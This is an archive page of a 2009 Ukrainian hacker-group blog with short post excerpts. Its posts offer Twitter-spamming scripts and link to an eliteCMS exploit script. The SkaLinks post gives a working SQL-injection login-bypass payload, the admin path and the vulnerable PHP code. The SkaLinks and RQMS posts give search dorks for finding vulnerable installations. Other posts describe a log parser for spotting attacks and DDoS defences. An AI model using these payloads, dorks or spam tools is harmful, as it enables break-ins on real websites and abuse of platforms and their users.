Archive

Archive for April, 2009

SimpleIrcBot 2.0

April 22nd, 2009 poma 2 comments 
SimpleIrcBot 2.0

Coded by eLwaux, Dimi4
[UASC] http://uasc.org.ua

Read more…

Categories: Кодинг Tags: , , ,

Скрипти для спама twitter’a

April 19th, 2009 presidentua 4 comments

Набір написаних на Python’і cкриптів для спама Твітера.

В архіві 4 файла:

  • sender.py
  • add.py
  • rediska.py
  • activity.py

Read more…

Categories: Кодинг Tags: , , ,

eliteCMS Exploit

April 19th, 2009 Dimi4 No comments

Вразливості у цій CMS були найдені мною ще 21.12.2008. А експлойт я таки не опублікував на цьому блозі.
публікую :) http://uasc.org.ua/files/eliteCMSexpl.pl.txt
{referrer_detector}

Categories: Експлоіти/Exploits Tags:

Paranormal Log Parser

April 18th, 2009 Dimi4 4 comments

Якшо ваш проект атакували, виникає необхідність проаналізувати ситуацію, визначити причини атаки, та можливі баги в коді. Переглядати в блокноті “тони” логів апача нудна справа – перевірено. Було б непогано якщо б автоматизувати цю справу. Так мені прийшла ідея створення скрипту, який би виявляв сліди атаки: xss, sql-injection, php-injection і т.д.

Скрипт сприймає логи такого виду:

127.0.0.1 – - [01/Jan/2009:00:00:00 -0001] “GET /sscript.php?param=val HTTP/1.1″ 200 13236 “http://127.0.0.1/sscript.php?param=val” “Opera/10.0 (Windows NT 5.1; U; ua)”

Read more…

Categories: Кодинг Tags:

DDoS. Відмова сервісу

April 14th, 2009 Dimi4 2 comments

Даний тип вразливостей – один з небагатьох, від яких захиститись повністю не можливо. Адже, навіть при бездоганно спроектованому та оптимізованому проекті, сервери відчуватимуть навантаження. Все залежить від масштабу атаки. Проте, є можливість протистояти атакам, достатньо забезпечити свій проект такими факторами:

  • Надійний хостинг
  • Анти-DDoS обладнання
  • Достатня ширина каналу
  • Гнучкі налаштування сервера

Read more…

Categories: Безпека Tags:

Вразливості RQMS

April 13th, 2009 Dimi4 No comments

Вразливості Rash Quote Management System

Офіційний сайт: http://rqms.sourceforge.net
Версія <=1.2.2
Вразливість знайдено: Dimi4
Dork: “Rash Version: 1.2.1
Read more…

Categories: Безпека Tags: , ,

Обхід Авторизації (Auth Bypass) SkaLinks

April 13th, 2009 Dimi4 No comments

Продукт : SkaLinks
Версія : 1.5
Dork : “Powered by SkaLinks “
Офіційний сат: http://www.skalinks.com/
Вразливість знайдена: Dimi4
Тип: SQL-injection, Auth Bypass

Вразливість існує через недостатню фільтрацію вхідних даних у функціїї авторизацїї
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1′ OR 1=1/*

Вразлива функція:

  1.  
  2. function IsAdmin( )
  3. {
  4. $table_name = $this->m_AdminsTable;
  5. $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`=’".$_COOKIE['adminname']."’ AND `Password`=’".$_COOKIE['pwd']."’");
  6. if ( !$res )
  7. {
  8. return 0;
  9. }
  10. else
  11. {
  12. return $res;
  13. }
  14. }
  15.  

(c) Dimi4, 2009 greetz to UASC, antichat

Categories: Безпека Tags: ,

Початок

April 9th, 2009 admin 3 comments

Вже доволі довгий час ми, UASC, думали створити блог, де б могли ділитися своїми досягненнями зі світом. І нарешті це сталося. Раді вас вітати тут!

Categories: Інше Tags: